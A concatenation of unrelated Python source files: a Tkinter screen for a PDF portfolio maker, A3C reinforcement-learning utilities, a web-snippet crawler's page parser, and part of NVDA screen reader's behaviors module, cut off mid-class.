self.img1 = PhotoImage (file=f"resources/images/screen4/img1.png")
self.img1_hover = PhotoImage (file=f"resources/images/screen4/img1_hover.png")
self.b1 = Label (
image=self.img1,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b1.place (
x=21, y=164,
width=56,
height=42)
self.b1.bind ("<Button-1>", lambda e: self.animate())
self.img2 = PhotoImage (file=f"resources/images/screen4/img2.png")
self.img2_hover = PhotoImage (file=f"resources/images/screen4/img2_hover.png")
self.b2 = Label(
image=self.img2,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b2.place (
x=35, y=279,
width=238,
height=86)
self.b2.bind("<Button-1>", lambda e: self.initialize_new_section(self.window.current_subject.assignments))
self.img3 = PhotoImage(file=f"resources/images/screen4/img3.png")
self.img3_hover = PhotoImage(file=f"resources/images/screen4/img3_hover.png")
self.b3 = Label(
image=self.img3,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b3.place (
x=33, y=405,
width=238,
height=86)
self.b3.bind("<Button-1>", lambda e: self.initialize_new_section(self.window.current_subject.quizzes))
self.img4 = PhotoImage(file=f"resources/images/screen4/img4.png")
self.img4_hover = PhotoImage(file=f"resources/images/screen4/img4_hover.png")
self.b4 = Label(
image=self.img4,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b4.place (
x=33, y=538,
width=238,
height=86)
self.b4.bind("<Button-1>", lambda e: self.initialize_new_section(self.window.current_subject.midterms))
self.img5 = PhotoImage (file=f"resources/images/screen4/img5.png")
self.img5_hover = PhotoImage (file=f"resources/images/screen4/img5_hover.png")
self.b5 = Label(
image=self.img5,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b5.place(
x=33, y=671,
width=238,
height=86)
self.b5.bind("<Button-1>", lambda e: self.initialize_new_section(self.window.current_subject.labs))
self.img6 = PhotoImage (file=f"resources/images/screen4/img6.png")
self.img6_hover = PhotoImage (file=f"resources/images/screen4/img6_hover.png")
self.b6 = Label(
image=self.img6,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b6.place (
x=33, y=798,
width=238,
height=86)
self.b6.bind("<Button-1>", lambda e: self.initialize_new_section(self.window.current_subject.project))
self.img7 = PhotoImage (file=f"resources/images/screen4/img7.png")
self.entry0_img = PhotoImage (file=f"resources/images/screen4/img_textBox0.png")
self.entry0_bg = self.canvas.create_image(
213.0, 185.0,
image=self.entry0_img)
self.entry0 = Entry (
bd=0,
bg="#ffffff",
highlightthickness=0)
self.entry0.place (
x=127.0, y=155,
width=172.0,
height=58)
self.img9 = PhotoImage (file=f"resources/images/screen4/img9.png")
self.img9_hover = PhotoImage (file=f"resources/images/screen4/img8_hover.png")
self.b9 = Label (
image=self.img9,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b9.place (
x=318, y=153,
width=62,
height=62)
self.b9.bind ("<Button-1>", lambda e: self.dropdown ())
self.img10 = PhotoImage (file=f"resources/images/screen4/img10.png")
self.img10_hover = PhotoImage (file=f"resources/images/screen4/img9_hover.png")
self.b10 = Label(
image=self.img10,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b10.place (
x=1190, y=156,
width=208,
height=53)
self.b10.bind("<Button-1>", func=lambda e: threading.Thread(target=self.window.merger_interface).start())
self.img11 = PhotoImage (file=f"resources/images/screen4/img11.png")
self.img11_hover = PhotoImage (file=f"resources/images/screen4/img10_hover.png")
self.b11 = Label (
image=self.img11,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b11.place (
x=952, y=155,
width=208,
height=53)
self.b11.bind("<Button-1>", lambda e: self.file_dialogue())
self.img12 = PhotoImage(file=f"resources/images/screen4/img12.png")
self.img12_hover = PhotoImage(file=f"resources/images/screen4/img11_hover.png")
self.b12 = Label(
image=self.img12,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b12.place(
x=714, y=155,
width=208,
height=53)
self.b12.bind("<Button-1>", lambda e: self.remove_selected_files())
self.img13_hover = PhotoImage(file=f"resources/images/screen4/switch_hover.png")
self.img13 = PhotoImage(file=f"resources/images/screen4/switch.png")
self.b13 = Label(
image=self.img13,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b13.place(
x=476, y=155,
width=208,
height=53)
self.b13.bind("<Button-1>", func=lambda e: self.switch_files())
self.img14 = PhotoImage(file=f"resources/images/screen4/img14.png")
self.img14_hover = PhotoImage(file=f"resources/images/screen4/img14_hover.png")
self.b14 = Label(
image=self.img14,
bg="#83568a",
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b14.place(
x=1279, y=24,
width=50,
height=50)
self.b14.bind("<Button-1>", lambda e: self.openurl("https://github.com/SpadeQ22/portfolio-maker-repo/"))
self.img15 = PhotoImage(file=f"resources/images/screen4/img15.png")
self.img15_hover = PhotoImage(file=f"resources/images/screen4/img15_hover.png")
self.b15 = Label(
image=self.img15,
bg="#83568a",
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b15.place(
x=1139, y=36,
width=100,
height=25)
self.b15.bind("<Button-1>", lambda e: self.openurl("https://www.linkedin.com/in/omaco2211/"))
self.wrapper = LabelFrame(self.canvas)
self.wrapper.pack(padx=405, pady=241)
self.canvas2 = Canvas(self.wrapper, height=703, width=969, bg="#fff", highlightthickness=0,
relief="ridge")
self.canvas2.pack(side=LEFT, fill=BOTH, expand=True)
self.vbar = ttk.Scrollbar(self.wrapper, orient=VERTICAL, command=self.canvas2.yview)
self.vbar.pack(side=RIGHT, fill=Y)
self.canvas2.configure(yscrollcommand=self.vbar.set)
self.canvas2.bind("<Configure>", func=lambda e: self.canvas2.configure(scrollregion=self.canvas2.bbox("all")))
self.myframe = Frame(self.canvas2, bg="#fff")
self.canvas2.create_window((0,0), window=self.myframe, anchor=NW)
self.myframe.bind("<Configure>", self.reset_scrollregion)
self.changeOnHoverButtons (self.b1, self.img1_hover, self.img1)
self.changeOnHoverButtons (self.b2, self.img2_hover, self.img2)
self.changeOnHoverButtons (self.b3, self.img3_hover, self.img3)
self.changeOnHoverButtons (self.b4, self.img4_hover, self.img4)
self.changeOnHoverButtons (self.b5, self.img5_hover, self.img5)
self.changeOnHoverButtons (self.b6, self.img6_hover, self.img6)
self.changeOnHoverButtons (self.b9, self.img9_hover, self.img9)
self.changeOnHoverButtons (self.b10, self.img10_hover, self.img10)
self.changeOnHoverButtons (self.b11, self.img11_hover, self.img11)
self.changeOnHoverButtons (self.b12, self.img12_hover, self.img12)
self.changeOnHoverButtons(self.b13, self.img13_hover, self.img13)
self.changeOnHoverButtons(self.b14, self.img14_hover, self.img14)
self.changeOnHoverButtons(self.b15, self.img15_hover, self.img15)
for subject in self.window.subjects:
self.add_option(subject)
self.initialize_new_subject()
def openurl(self, url):
webbrowser.open_new(url)
def initialize_new_subject(self):
self.entry0.delete(0, END)
self.entry0.insert(0, self.window.current_subject.ASU_course_code)
self.initialize_new_section(self.window.current_subject.assignments)
def initialize_new_section(self, section):
self.section = section
self.files = self.section.file_paths
self.cards = []
self.selected_cards = []
self.remove_cards()
self.set_cards()
def set_cards(self):
for path in self.files:
self.add_preview(path)
def reset_scrollregion(self, e):
self.canvas2.configure(scrollregion=self.canvas2.bbox("all"))
def changeOnHoverButtons(self, button, colorOnHover, colorOnLeave):
button.bind ("<Enter>", func=lambda e: button.config(
image=colorOnHover))
button.bind ("<Leave>", func=lambda e: button.config(
image=colorOnLeave))
def remove_cards(self):
self.row = 0
self.col = 0
for child in self.myframe.winfo_children():
child.destroy()
def remove_selected_files(self):
if len(self.selected_cards) > 0:
for child in self.selected_cards:
child.label.destroy()
self.cards = list(set(self.cards) - set(self.selected_cards))
self.files = [card.path for card in self.cards]
self.section.file_paths = self.files
self.selected_cards = []
self.reorganize()
def reorganize(self):
self.row = 0
self.col = 0
for file in self.cards:
file.label.grid(column=self.col % 4, row=self.row, padx=35, pady=20)
self.col += 1
if self.col % 4 == 0:
self.row += 1
def file_dialogue(self):
names = filedialog.askopenfilenames(filetypes=[('files', '.pdf')])
for name in names:
if name != "":
self.files.append(name)
self.add_preview(name)
self.section.file_paths = self.files
def add_preview(self, path):
print(path)
pages = convert_from_path(path, poppler_path="resources/poppler-0.68.0/bin", first_page=1, last_page=1)
img = pages[0]
img = img.resize((175, 248), Image.ANTIALIAS)
photoImg = ImageTk.PhotoImage(img)
self.images.append(photoImg)
self.add_file(path, os.path.basename(path).replace(".png", ".pdf"), self.images[len(self.images) - 1])
def add_file(self, path, file_name, img):
label = Label(self.myframe,
image=img,
bg="white",
height=300,
width=175,
borderwidth=0,
highlightthickness=0,
compound='top',
text=f"{file_name}",
fg="blue",
wraplength=170,
justify=CENTER)
label.grid(column=self.col % 4, row=self.row, padx=35, pady=20)
self.col += 1
if self.col % 4 == 0:
self.row += 1
card = Card(path, label)
self.changeOnHover(card)
self.cards.append(card)
def switch_files(self):
if len(self.selected_cards) == 2:
info_1 = self.selected_cards[0].label.grid_info()
info_2 = self.selected_cards[1].label.grid_info()
self.selected_cards[0].label.grid(info_2)
self.selected_cards[1].label.grid(info_1)
else:
tkinter.messagebox.showerror("Error", "Error 101: Exactly 2 Files Need to be Selected")
def select(self, button):
button.unbind("<Leave>")
button.config(bg="#93B5C6")
def unselect(self, button):
button.config(bg="white")
button.bind("<Leave>", func=lambda e: button.config(
bg="white"))
def clicked_file(self, card):
card.selected = not card.selected
if card.selected:
self.select(card.label)
self.selected_cards.append(card)
else:
self.unselect(card.label)
self.selected_cards.remove(card)
def changeOnHover(self, card):
card.label.bind("<Enter>", func=lambda e: card.label.configure(
bg="#93B5C6"))
card.label.bind("<Leave>", func=lambda e: card.label.configure(
bg="white"))
card.label.bind("<Button-1>", lambda e: self.clicked_file(card), add=True)
def display(self):
self.count -= 1
xcor = self.b0.winfo_x()
ycor = self.b0.winfo_y()
xcor2 = self.b2.winfo_x()
ycor2 = self.b2.winfo_y()
xcor3 = self.b3.winfo_x()
ycor3 = self.b3.winfo_y()
xcor4 = self.b4.winfo_x()
ycor4 = self.b4.winfo_y()
xcor5 = self.b5.winfo_x()
ycor5 = self.b5.winfo_y()
xcor6 = self.b6.winfo_x()
ycor6 = self.b6.winfo_y()
if self.count > 0 and not self.switch:
self.b0.place(x=xcor + 4.8, y=ycor)
self.b2.place(x=xcor2 + 4.8, y=ycor2)
self.b3.place(x=xcor3 + 4.8, y=ycor3)
self.b4.place(x=xcor4 + 4.8, y=ycor4)
self.b5.place(x=xcor5 + 4.8, y=ycor5)
self.b6.place(x=xcor6 + 4.8, y=ycor6)
display_event = self.window.after(10, self.display)
def hide(self):
self.count += 1
xcor = self.b0.winfo_x()
ycor = self.b0.winfo_y()
xcor2 = self.b2.winfo_x()
ycor2 = self.b2.winfo_y()
xcor3 = self.b3.winfo_x()
ycor3 = self.b3.winfo_y()
xcor4 = self.b4.winfo_x()
ycor4 = self.b4.winfo_y()
xcor5 = self.b5.winfo_x()
ycor5 = self.b5.winfo_y()
xcor6 = self.b6.winfo_x()
ycor6 = self.b6.winfo_y()
if self.count < 70 and self.switch:
self.b0.place(x=xcor - 5, y=ycor)
self.b2.place(x=xcor2 - 5, y=ycor2)
self.b3.place(x=xcor3 - 5, y=ycor3)
self.b4.place(x=xcor4 - 5, y=ycor4)
self.b5.place(x=xcor5 - 5, y=ycor5)
self.b6.place(x=xcor6 - 5, y=ycor6)
hide_event = self.window.after(10, self.hide)
def animate_up(self, button):
xcor = button.winfo_x()
ycor = button.winfo_y()
if ycor != 209:
button.place(x=xcor, y=ycor-1)
self.window.after(5, self.animate, button)
def animate(self):
self.switch = not self.switch
if self.switch:
self.hide()
else:
self.display()
def drop(self):
xcor = self.x_option
ycor = self.y_option
for option in self.options:
option.place(x=xcor, y=ycor)
ycor += 60
def up(self):
for option in self.options:
option.place_forget()
def dropdown(self):
self.drop_switch = not self.drop_switch
if self.drop_switch:
self.drop()
else:
self.up()
def add_option(self, subject):
option = Label(
image=self.img7,
borderwidth=1,
highlightthickness=1,
text=subject.ASU_course_code,
compound=CENTER,
relief="flat",
width=220,
height=60)
option.bind("<Button-1>", lambda e: self.set_current_subject(subject))
option.bind("<Enter>", func=lambda e: option.configure(
bg="#93B5C6"))
option.bind("<Leave>", func=lambda e: option.configure(
bg="white"))
self.options.append(option)
def set_current_subject(self, subject):
self.window.current_subject = subject
self.initialize_new_subject()
self.dropdown()
|
utils.py
|
import numpy as np
import torch
import torch.nn as nn
import torch.multiprocessing as mp
from torch.autograd import Variable
import gym
import argparse
import matplotlib.pyplot as plt
import seaborn as sns
import os
import datetime
import pickle
import time
from collections import deque
'''
@authors:
Nicklas Hansen,
Peter Ebert Christensen
'''
# Load CUDA
CUDA = False#torch.cuda.is_available()
print('CUDA has been enabled.' if CUDA is True else 'CUDA has been disabled.')
# Define tensors
FloatTensor = torch.cuda.FloatTensor if CUDA else torch.FloatTensor
IntTensor = torch.cuda.IntTensor if CUDA else torch.IntTensor
LongTensor = torch.cuda.LongTensor if CUDA else torch.LongTensor
ByteTensor = torch.cuda.ByteTensor if CUDA else torch.ByteTensor
Tensor = FloatTensor
# Set global datetime
dt = str(datetime.datetime.now()).split('.')[0].replace(' ', '-')[5:]
class Agent(nn.Module):
# Interface for a neural RL agent
def __init__(self, args):
super(Agent, self).__init__()
_env = gym.make(args.env)
self.size_in = _env.observation_space.shape[0]
try:
self.size_out = _env.action_space.shape[0]
except:
self.size_out = _env.action_space.n
if 'CarRacing' in args.env: self.size_out = 6
self.gamma = args.gamma
def forward(self, x):
return None
def normalized_init(self, weights, std=1.0):
x = torch.randn(weights.size())
x *= std / torch.sqrt((x**2).sum(1, keepdim=True))
return x
class Conv(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, dilation=1, stride=1, padding=False):
super(Conv, self).__init__()
padding = int((kernel_size - 1) / 2) if padding else 0
self.conv = nn.Sequential(
nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, dilation=dilation, stride=stride,
padding=padding),
nn.ReLU()
)
def forward(self, x):
return self.conv(x)
def hogwild(model, args, train_func, test_func):
# Hogwild algorithm
model.share_memory()
processes = []
for rank in range(args.num_processes):
p = mp.Process(target=train_func, args=(model, args, rank))
p.start()
processes.append(p)
for p in processes:
p.join()
# Test trained model
test_func(model, args)
def init_hidden(batch_size, size_hidden):
# Initialize hidden states for a LSTM cell
hx = Variable(torch.zeros(batch_size, size_hidden))
cx = Variable(torch.zeros(batch_size, size_hidden))
return hx, cx
def plot(mean, std, args, labels=None, ylim_bot=None, save_path=None, walltime=None):
# Plots the learning of a worker
sns.set(style="darkgrid", font_scale=1.25)
plt.figure(figsize=(12,10))
if len(mean.shape) > 1 or walltime is not None:
for i in range(len(mean)):
if walltime is None:
iterations = np.array(range(len(mean[i]))) * args.print_freq
else:
iterations = walltime[i] / 60
plt.fill_between(iterations, mean[i]-std[i], mean[i]+std[i], alpha=0.2)
label = labels[i] if labels is not None else None
plt.plot(iterations, mean[i], label=f'A3C, {label}' if label is not None else 'A3C')
else:
iterations = np.array(range(len(mean))) * args.print_freq
if std is not None:
plt.fill_between(iterations, mean-std, mean+std, alpha=0.2)
plt.plot(iterations, mean, label='A3C')
plt.title(args.env)
plt.xlabel('Iteration' if walltime is None else 'Walltime (minutes)')
plt.ylabel('Mean reward')
plt.legend()
if len(iterations) > 1: plt.xlim(left=0, right=iterations[-1])
if ylim_bot is not None: plt.ylim(bottom=ylim_bot)
path = get_results_path() + 'reward.png' if save_path is None else save_path
plt.savefig(path)
plt.close()
def moving_average(a, n=10) :
ret = np.cumsum(a, dtype=float)
ret[n:] = ret[n:] - ret[:-n]
return ret / n
def get_results_path(timestamp = dt):
path = os.getcwd() + '/results/' + timestamp + '/'
if not os.path.exists(path): os.makedirs(path)
return path
def save_rewards(rewards):
with open(get_results_path() + 'rewards.pkl', 'wb') as f:
pickle.dump(rewards, f)
def save_walltime(walltime):
with open(get_results_path() + 'walltime.pkl', 'wb') as f:
pickle.dump(walltime, f)
def save_model(model, args, rewards):
path = get_results_path()
torch.save(model.state_dict(), path + 'model.pkl')
with open(path + 'args.pkl', 'wb') as f:
pickle.dump(args, f)
save_rewards(rewards)
def load_args(timestamp):
path = get_results_path(timestamp)
with open(path + 'args.pkl', 'rb') as f:
return pickle.load(f)
def load_model(model, timestamp):
path = get_results_path(timestamp)
model.load_state_dict(torch.load(path + 'model.pkl'))
return model
|
Assigner.py
|
#!/usr/bin/env python3
"""Parsing raw pages into JSON data for snippet crawler"""
from BaseLogger import BaseLogger
from DatabaseAccessor import DatabaseAccessor
from config import config_crawl_date_min, config_assign_process, config_idle_sleep
from contextlib import closing
from json import loads
from multiprocessing import Process
from platform import node
from re import sub
from time import sleep
class Assigner(BaseLogger):
def __init__(self, log_level=None):
BaseLogger.__init__(self, self.__class__.__name__, log_level)
self._db_conn = DatabaseAccessor()
self._log_info("assigner start @%s", node())
def close(self):
self._db_conn.close()
self._log_info("assigner exit")
self._close_logger()
def process(self):
url = None
job = self._db_conn.queue_page_take_raw()
if job != None:
url = job['url']
text = job.get('text', "")
parse_result = self._parse_raw_page(url, text)
if parse_result == None:
self._log_warning("fail to parse '%s' as JSON in queue_page", url)
if not self._db_conn.queue_page_fail_raw(url):
self._log_warning("fail to mark %s as 'fail' in queue_page", url)
else:
if parse_result[0] == None:
self._log_warning("'%s' in queue_page indicates no more new content", url)
else:
self._log_info("%s indicates new crawling job: %s", url, parse_result[0])
if not self._db_conn.queue_crawl_create(parse_result[0]):
self._log_warning("fail to add %s as 'new' job in queue_crawl", parse_result[0])
if parse_result[1] == None:
self._log_warning("'%s' in queue_page contains on content", url)
else:
self._log_info("%s contains %d raw snippets", url, len(parse_result[1]))
if not self._db_conn.queue_page_done_raw(url, parse_result[1]):
self._log_warning("fail to append parsed data for %s in queue_crawl", url)
else:
self._log_warning("grab no jobs to assign")
sleep(config_idle_sleep)
return url
def _parse_raw_page(self, url, text):
try:
page_content = loads(text)
url_new, data_new = None, None
if (page_content["data"]["has_more"]) and (page_content["data"]["max_time"] > config_crawl_date_min):
url_new = sub(r"=(\d*)$", r"=" + str(page_content["data"]["max_time"]), url)
if len(page_content["data"]["data"]) > 0:
data_new = page_content["data"]["data"]
result = (url_new, data_new)
self._log_info(
"%s data status - more: %s, min: %d, max: %d",
url,
page_content["data"]["has_more"],
page_content["data"]["min_time"],
page_content["data"]["max_time"])
except Exception as e:
result = None
return result
def main(times=10):
with closing(Assigner()) as assigner:
if times:
for _ in range(times):
assigner.process()
else:
while True:
assigner.process()
if __name__ == '__main__':
for _ in range(config_assign_process):
Process(target=main, args=(0,)).start()
|
behaviors.py
|
# -*- coding: UTF-8 -*-
# NVDAObjects/behaviors.py
# A part of NonVisual Desktop Access (NVDA)
# This file is covered by the GNU General Public License.
# See the file COPYING for more details.
# Copyright (C) 2006-2019 NV Access Limited, Peter Vágner, Joseph Lee, Bill Dengler
"""Mix-in classes which provide common behaviour for particular types of controls across different APIs.
Behaviors described in this mix-in include providing table navigation commands for certain table rows, terminal input and output support, announcing notifications and suggestion items and so on.
"""
import os
import time
import threading
import difflib
import tones
import queueHandler
import eventHandler
import controlTypes
import speech
import characterProcessing
import config
from . import NVDAObject, NVDAObjectTextInfo
import textInfos
import editableText
from logHandler import log
from scriptHandler import script
import api
import ui
import braille
import nvwave
class ProgressBar(NVDAObject):
progressValueCache={} #key is made of "speech" or "beep" and an x,y coordinate, value is the last percentage
def event_valueChange(self):
pbConf=config.conf["presentation"]["progressBarUpdates"]
states=self.states
if pbConf["progressBarOutputMode"]=="off" or controlTypes.STATE_INVISIBLE in states or controlTypes.STATE_OFFSCREEN in states:
return super(ProgressBar,self).event_valueChange()
val=self.value
try:
percentage = min(max(0.0, float(val.strip("%\0"))), 100.0)
except (AttributeError, ValueError):
log.debugWarning("Invalid value: %r" % val)
return super(ProgressBar, self).event_valueChange()
braille.handler.handleUpdate(self)
if not pbConf["reportBackgroundProgressBars"] and not self.isInForeground:
return
try:
left,top,width,height=self.location
except:
left=top=width=height=0
x = left + (width // 2)
y = top+ (height // 2)
lastBeepProgressValue=self.progressValueCache.get("beep,%d,%d"%(x,y),None)
if pbConf["progressBarOutputMode"] in ("beep","both") and (lastBeepProgressValue is None or abs(percentage-lastBeepProgressValue)>=pbConf["beepPercentageInterval"]):
tones.beep(pbConf["beepMinHZ"]*2**(percentage/25.0),40)
self.progressValueCache["beep,%d,%d"%(x,y)]=percentage
lastSpeechProgressValue=self.progressValueCache.get("speech,%d,%d"%(x,y),None)
if pbConf["progressBarOutputMode"] in ("speak","both") and (lastSpeechProgressValue is None or abs(percentage-lastSpeechProgressValue)>=pbConf["speechPercentageInterval"]):
queueHandler.queueFunction(queueHandler.eventQueue,speech.speakMessage,_("%d percent")%percentage)
self.progressValueCache["speech,%d,%d"%(x,y)]=percentage
class Dialog(NVDAObject):
"""Overrides the description property to obtain dialog text.
"""
@classmethod
def getDialogText(cls,obj,allowFocusedDescendants=True):
"""This classmethod walks through the children of the given object, and collects up and returns any text that seems to be part of a dialog's message text.
@param obj: the object who's children you want to collect the text from
@type obj: L{IAccessible}
@param allowFocusedDescendants: if false no text will be returned at all if one of the descendants is focused.
@type allowFocusedDescendants: boolean
"""
children=obj.children
textList=[]
childCount=len(children)
for index in range(childCount):
child=children[index]
childStates=child.states
childRole=child.role
#We don't want to handle invisible or unavailable objects
if controlTypes.STATE_INVISIBLE in childStates or controlTypes.STATE_UNAVAILABLE in childStates:
continue
#For particular objects, we want to descend in to them and get their children's message text
if childRole in (
controlTypes.ROLE_PROPERTYPAGE,
controlTypes.ROLE_PANE,
controlTypes.ROLE_PANEL,
controlTypes.ROLE_WINDOW,
controlTypes.ROLE_GROUPING,
controlTypes.ROLE_PARAGRAPH,
controlTypes.ROLE_SECTION,
controlTypes.ROLE_TEXTFRAME,
controlTypes.ROLE_UNKNOWN
):
#Grab text from descendants, but not for a child which inherits from Dialog and has focusable descendants
#Stops double reporting when focus is in a property page in a dialog
childText=cls.getDialogText(child,not isinstance(child,Dialog))
if childText:
textList.append(childText)
elif childText is None:
return None
continue
#If the child is focused we should just stop and return None
if not allowFocusedDescendants and controlTypes.STATE_FOCUSED in child.states:
return None
# We only want text from certain controls.
if not (
# Static text, labels and links
childRole in (controlTypes.ROLE_STATICTEXT,controlTypes.ROLE_LABEL,controlTypes.ROLE_LINK)
# Read-only, non-multiline edit fields
or (childRole==controlTypes.ROLE_EDITABLETEXT and controlTypes.STATE_READONLY in childStates and controlTypes.STATE_MULTILINE not in childStates)
):
continue
#We should ignore a text object directly after a grouping object, as it's probably the grouping's description
if index>0 and children[index-1].role==controlTypes.ROLE_GROUPING:
continue
#Like the last one, but a graphic might be before the grouping's description
if index>1 and children[index-1].role==controlTypes.ROLE_GRAPHIC and children[index-2].role==controlTypes.ROLE_GROUPING:
continue
childName=child.name
if childName and index<(childCount-1) and children[index+1].role not in (controlTypes.ROLE_GRAPHIC,controlTypes.ROLE_STATICTEXT,controlTypes.ROLE_SEPARATOR,controlTypes.ROLE_WINDOW,controlTypes.ROLE_PANE,controlTypes.ROLE_BUTTON) and children[index+1].name==childName:
# This is almost certainly the label for the next object, so skip it.
continue
isNameIncluded=child.TextInfo is NVDAObjectTextInfo or childRole in (controlTypes.ROLE_LABEL,controlTypes.ROLE_STATICTEXT)
childText=child.makeTextInfo(textInfos.POSITION_ALL).text
if not childText or childText.isspace() and child.TextInfo is not NVDAObjectTextInfo:
childText=child.basicText
isNameIncluded=True
if not isNameIncluded:
# The label isn't in the text, so explicitly include it first.
if childName:
textList.append(childName)
if childText:
textList.append(childText)
return "\n".join(textList)
def _get_description(self):
superDesc = super(Dialog, self).description
if superDesc and not superDesc.isspace():
# The object already provides a useful description, so don't override it.
return superDesc
return self.getDialogText(self)
value = None
def _get_isPresentableFocusAncestor(self):
# Only fetch this the first time it is requested,
# as it is very slow due to getDialogText and the answer shouldn't change anyway.
self.isPresentableFocusAncestor = res = super(Dialog, self).isPresentableFocusAncestor
return res
class EditableText(editableText.EditableText, NVDAObject):
"""Provides scripts to report appropriately when moving the caret in editable text fields.
This does not handle selection changes.
To handle selection changes, use either L{EditableTextWithAutoSelectDetection} or L{EditableTextWithoutAutoSelectDetection}.
"""
shouldFireCaretMovementFailedEvents = True
def initOverlayClass(self):
# #4264: the caret_newLine script can only be bound for processes other than NVDA's process
# As Pressing enter on an edit field can cause modal dialogs to appear, yet gesture.send and api.processPendingEvents may call.wx.yield which ends in a freeze.
if self.announceNewLineText and self.processID!=os.getpid():
self.bindGesture("kb:enter","caret_newLine")
self.bindGesture("kb:numpadEnter","caret_newLine")
class EditableTextWithAutoSelectDetection(EditableText):
"""In addition to L{EditableText}, handles reporting of selection changes for objects which notify of them.
To have selection changes reported, the object must notify of selection changes via the caret event.
Optionally, it may notify of changes to content via the textChange, textInsert and textRemove events.
If the object supports selection but does not notify of selection changes, L{EditableTextWithoutAutoSelectDetection} should be used instead.
"""
def event_gainFocus(self):
super(EditableText, self).event_gainFocus()
self.initAutoSelectDetection()
def event_caret(self):
super(EditableText, self).event_caret()
if self is api.getFocusObject() and not eventHandler.isPendingEvents('gainFocus'):
self.detectPossibleSelectionChange()
def event_textChange(self):
self.hasContentChangedSinceLastSelection = True
def event_textInsert(self):
self.hasContentChangedSinceLastSelection = True
def event_textRemove(self):
self.hasContentChangedSinceLastSelection = True
class EditableTextWithoutAutoSelectDetection(editableText.EditableTextWithoutAutoSelectDetection, EditableText):
"""In addition to L{EditableText}, provides scripts to report appropriately when the selection changes.
This should be used when an object does not notify of selection changes.
"""
initOverlayClass = editableText.EditableTextWithoutAutoSelectDetection.initClass
class LiveText(NVDAObject):
"""An object for which new text should be reported automatically.
These objects present text as a single chunk
and only fire an event indicating that some part of the text has changed; i.e. they don't provide the new text.
Monitoring must be explicitly started and stopped using the L{startMonitoring} and L{stopMonitoring} methods.
The object should notify of text changes using the textChange event.
"""
#: The time to wait before fetching text after a change event.
STABILIZE_DELAY = 0
# If the text is live, this is definitely content.
presentationType = NVDAObject.presType_content
announceNewLineText=False
def initOverlayClass(self):
self._event = threading.Event()
self._monitorThread = None
self._keepMonitoring = False
def startMonitoring(self):
"""Start monitoring for new text.
New text will be reported when it is detected.
@note: If monitoring has already been started, this will have no effect.
@see: L{stopMonitoring}
"""
if self._monitorThread:
return
thread = self._monitorThread = threading.Thread(target=self._monitor)
thread.daemon = True
self._keepMonitoring = True
self._event.clear()
thread.start()
def stopMonitoring(self):
"""Stop monitoring previously started with L{startMonitoring}.
@note: If monitoring has not been started, this will have no effect.
@see: L{startMonitoring}
"""
if not self._monitorThread:
return
self._keepMonitoring = False
self._event.set()
self._monitorThread = None
def event_textChange(self):
"""Fired when the text changes.
@note: It is safe to call this directly from threads other than the main thread.
"""
self._event.set()
def _getTextLines(self):
"""Retrieve the text of this object in lines.
This will be used to determine the new text to speak.
The base implementation uses the L{TextInfo}.
However, subclasses should override this if there is a better way to retrieve the text.
@return: The current lines of text.
@rtype: list of str
"""
return list(self.makeTextInfo(textInfos.POSITION_ALL).getTextInChunks(textInfos.UNIT_LINE))
def _reportNewLines(self, lines):
"""
Reports new lines of text using _reportNewText for each new line.
Subclasses may override this method to provide custom filtering of new text,
where logic depends on multiple lines.
"""
for line in lines:
self._reportNewText(line)
def _reportNewText(self, line):
"""Report a line of new text.
"""
speech.speakText(line)
def _monitor(self):
try:
oldLines = self._getTextLines()
except:
log.exception("Error getting initial lines")
oldLines = []
while self._keepMonitoring:
self._event.wait()
if not self._keepMonitoring:
break
if self.STABILIZE_DELAY > 0:
# wait for the text to stabilise.
time.sleep(self.STABILIZE_DELAY)
if not self._keepMonitoring:
# Monitoring was stopped while waiting for the text to stabilise.
break
self._event.clear()
try:
newLines = self._getTextLines()
if config.conf["presentation"]["reportDynamicContentChanges"]:
outLines = self._calculateNewText(newLines, oldLines)
if len(outLines) == 1 and len(outLines[0].strip()) == 1:
# This is only a single character,
# which probably means it is just a typed character,
# so ignore it.
del outLines[0]
if outLines:
queueHandler.queueFunction(queueHandler.eventQueue, self._reportNewLines, outLines)
oldLines = newLines
except:
log.exception("Error getting lines or calculating new text")
def _calculateNewText(self, newLines, oldLines):
outLines = []
prevLine = None
for line in difflib.ndiff(oldLines, newLines):
if line[0] == "?":
# We're never interested in these.
continue
if line[0] != "+":
# We're only interested in new lines.
prevLine = line
continue
text = line[2:]
if not text or text.isspace():
prevLine = line
continue
if prevLine and prevLine[0] == "-" and len(prevLine) > 2:
# It's possible that only a few characters have changed in this line.
# If so, we want to speak just the changed section, rather than the entire line.
prevText = prevLine[2:]
textLen = len(text)
prevTextLen = len(prevText)
# Find the first character that differs between the two lines.
for pos in range(min(textLen, prevTextLen)):
if text[pos] != prevText[pos]:
start = pos
break
else:
# We haven't found a differing character so far and we've hit the end of one of the lines.
# This means that the differing text starts here.
start = pos + 1
# Find the end of the differing text.
if textLen != prevTextLen:
# The lines are different lengths, so assume the rest of the line changed.
end = textLen
else:
for pos in range(textLen - 1, start - 1, -1):
if text[pos] != prevText[pos]:
end = pos + 1
break
if end - start < 15:
# Less than 15 characters have changed, so only speak the changed chunk.
text = text[start:end]
if text and not text.isspace():
outLines.append(text)
prevLine = line
return outLines
class Terminal(LiveText, EditableText):
"""An object which both accepts text input and outputs text which should be reported automatically.
This is an L{EditableText} object,
as well as a L{liveText} object for which monitoring is automatically enabled and disabled based on whether it has focus.
"""
role = controlTypes.ROLE_TERMINAL
def event_gainFocus(self):
super(Terminal, self).event_gainFocus()
self.startMonitoring()
def event_loseFocus(self):
super(Terminal, self).event_loseFocus()
self.stopMonitoring()
def _get_caretMovementDetectionUsesEvents(self):
"""Using caret events in consoles sometimes causes the last character of the
prompt to be read when quickly deleting text."""
return False
class KeyboardHandlerBasedTypedCharSupport(Terminal):
"""A Terminal object that also provides typed character support for
console applications via keyboardHandler events.
